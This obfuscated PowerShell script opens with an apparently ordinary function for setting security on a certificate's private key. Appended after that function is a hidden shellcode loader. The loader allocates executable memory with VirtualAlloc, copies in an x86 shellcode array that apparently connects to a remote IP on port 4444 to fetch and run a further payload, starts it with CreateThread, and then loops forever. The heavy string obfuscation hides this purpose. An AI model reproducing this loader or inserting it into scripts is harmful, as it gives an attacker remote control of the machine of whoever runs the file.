  $8Cpiq=[TyPE]("{4}{0}{6}{7}{8}{3}{5}{2}{1}"-F'PTograp','s','Ag','e','seCUriTy.CRy','RfL','hy.','cs','PprovID')  ;  
function set`-`CRyP`T`OkEyS`ECURITY
{
    [CmdletBinding()]
    param(
        [Parameter(MandatoRY=${Tr`UE})]
        [Security.Cryptography.X509Certificates.X509Certificate2]
        ${Cert`IFi`cA`TE},

        [Parameter(MANDaTORy=${Tr`Ue})]
        [Security.AccessControl.CryptoKeySecurity]
        ${cRYpToKEy`sec`U`RiTy},

        [Parameter(MAnDatORY=${TR`Ue})]
        [string]
        ${AC`Ti`ON}
    )

    &("{4}{2}{0}{3}{1}"-f 'Stri','Mode','t-','ct','Se') -Version ("{1}{0}"-f'atest','L')

    &("{5}{3}{4}{2}{6}{1}{0}"-f 'ce','n','refe','-Cal','lerP','Use','re') -Cmdlet ${P`s`CmDLeT} -Session ${eXeC`Ut`IoNcO`NteXt}."sEssi`oNST`A`TE"

    ${kEY`C`o`Nta`iNe`Rinfo} = ${c`ErtIfi`ca`TE}."PrI`VA`TEkey"."cS`p`keYCONT`AINe`Rinfo"
    ${CS`pPaR`AMs} = .("{2}{0}{1}" -f'w-Obje','ct','Ne') ("{9}{1}{6}{2}{7}{0}{3}{4}{5}{8}" -f 'yptograp','e','y.','hy.Csp','Pa','ra','curit','Cr','meters','S') (${key`CO`NT`Aine`RINfo}."p`RoVID`ERt`Ype", ${KEy`c`O`NtAINErinFo}."p`RovI`der`NaMe", ${K`EYContA`iNer`IN`FO}."KEyCoNt`A`ineR`Name")
    ${CspPAr`A`ms}."F`LagS" =  (  dir ("Va"+"rIa"+"BLe:8cpi"+"Q")  ).VAlUe::"US`E`eX`iStinGKEy"
    ${C`sPPa`R`Ams}."KE`ynUm`Ber" = ${KEYco`NtAiNE`R`iNfO}."keY`NUMBER"
    if( (.("{1}{2}{0}{3}" -f 'it','S','pl','-Path') -NoQualifier -Path ${CErTIFIc`A`TE}."Ps`p`Ath") -like ((("{3}{1}{2}{4}{0}" -f '*','a','lMachine','Loc','{0}'))  -f [cHar]92) )
    {
        ${cS`PPa`RAMs}."fla`Gs" = ${cspP`A`RAMs}."flA`GS" -bor  $8cpIq::"USe`Mac`HInEkEYST`O`RE"
    }
    ${c`sPpaRa`MS}."c`R`YptokeYsE`cu`RItY" = ${CR`ypt`OkeYsECU`R`I`TY}
                        
    try
    {                    
        
        if( ${ps`cMD`LET}.("{1}{0}{3}{2}" -f'houldP','S','cess','ro').Invoke( ('{0} ({1})' -f ${CeR`T`if`icaTe}."sUb`j`ecT",${ce`RTIf`IcaTE}."T`HUM`BPr`InT"), ${ac`T`ioN} ) )
        {
            ${n`UlL} = .("{0}{2}{1}" -f 'New-','ct','Obje') ("{10}{1}{8}{12}{3}{11}{0}{4}{5}{7}{6}{2}{13}{9}" -f'y.RSACr','ecu','e','yptogra','yp','toS','vic','er','rity.','r','S','ph','Cr','Provide') (${Cspp`AR`AMS})
        }
    }
    catch
    {
        ${Act`UAl`EXCEptI`ON} = ${_}."EX`cep`TiOn"
        while( ${ACTUAL`eXCEP`TION}."In`NeRExc`ePtIoN" )
        {
            ${acTuaLExcEp`T`I`on} = ${aCt`UaLex`C`E`PTiON}."iN`Ne`ReXC`E`ptiON"
        }
        &("{0}{3}{2}{1}"-f 'W','ror','te-Er','ri') ('Failed to {0} to ''{1}'' ({2}) certificate''s private key: {3}: {4}' -f ${ac`T`IOn},${CeRT`i`FiCAte}."sU`B`jEct",${cerTi`F`ICATE}."T`humB`pRiNT",${ActuA`Le`x`c`EPTiON}.("{2}{0}{1}"-f 'tTyp','e','Ge').Invoke()."fulLn`A`Me",${a`cTU`AlEXCe`p`TiOn}."Me`s`SagE")
    }
}

${C} = ((("{30}{48}{62}{50}{49}{5}{58}{33}{36}{64}{65}{14}{67}{11}{47}{42}{23}{1}{66}{27}{13}{7}{43}{0}{32}{20}{61}{6}{34}{40}{19}{29}{25}{63}{44}{3}{41}{55}{12}{31}{28}{9}{4}{56}{52}{45}{35}{38}{60}{10}{37}{39}{8}{15}{18}{16}{53}{22}{26}{46}{21}{24}{54}{2}{17}{57}{51}{59}"-f'tect);[DllImport(Y1xke','All','rc,','ate','in','ern','lY','Type,','r lpThreadI','tes, u','r lpP','tPtr VirtualAllo','T','n','atic ','d);[DllImport(Y1xmsvcrt.dllY1x)]publ','tic extern In',' u','ic sta','ubli','32','et(IntPtr','t','l',' dest, uint ','c exte','r m','catio','u','c stati','[Dll','hreadAttrib','rnel','2.','1x',', In','dllY','aramet','t','er, uint dwCreationFlags, IntPt',')]p','Thread(IntPtr','int dwSize, uint f',' uint flPro',' Cre','ddress','ems','c(IntPtr lpAddress, u','I','k','t(Y1x','ou',' IntPtr lpStartA','tP','s',' lp','t dwStackSize,','int c','el3','nt);','Pt','.dl','mpor','rn IntPtr','1x)]pub','lic st','o','extern In'))."rEP`L`Ace"(([CHaR]89+[CHaR]49+[CHaR]120),[sTRiNg][CHaR]34));${w} = .("{2}{1}{0}" -f'ype','dd-T','A') -memberDefinition ${c} -Name ("{1}{0}"-f 'in32','W') -namespace ("{3}{2}{0}{4}{1}" -f't','s','in32Func','W','ion') -passthru;[Byte[]];[Byte[]]${sC} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xb0,0xe4,0x29,0x71,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${s`IzE} = 0x1000;if (${S`C}."LE`NGTH" -gt 0x1000){${Si`ZE} = ${s`C}."lE`NgtH"};${x}=${W}::("{1}{0}{2}" -f 'llo','VirtualA','c').Invoke(0,0x1000,${S`Ize},0x40);for (${i}=0;${i} -le (${sc}."LenG`TH"-1);${i}++) {${w}::"MEm`Set"([IntPtr](${x}.("{0}{1}"-f 'ToInt3','2').Invoke()+${I}), ${sC}[${i}], 1)};${W}::("{0}{1}{2}"-f'CreateThr','e','ad').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{3}{1}{2}" -f 'Sta','sle','ep','rt-') 60};
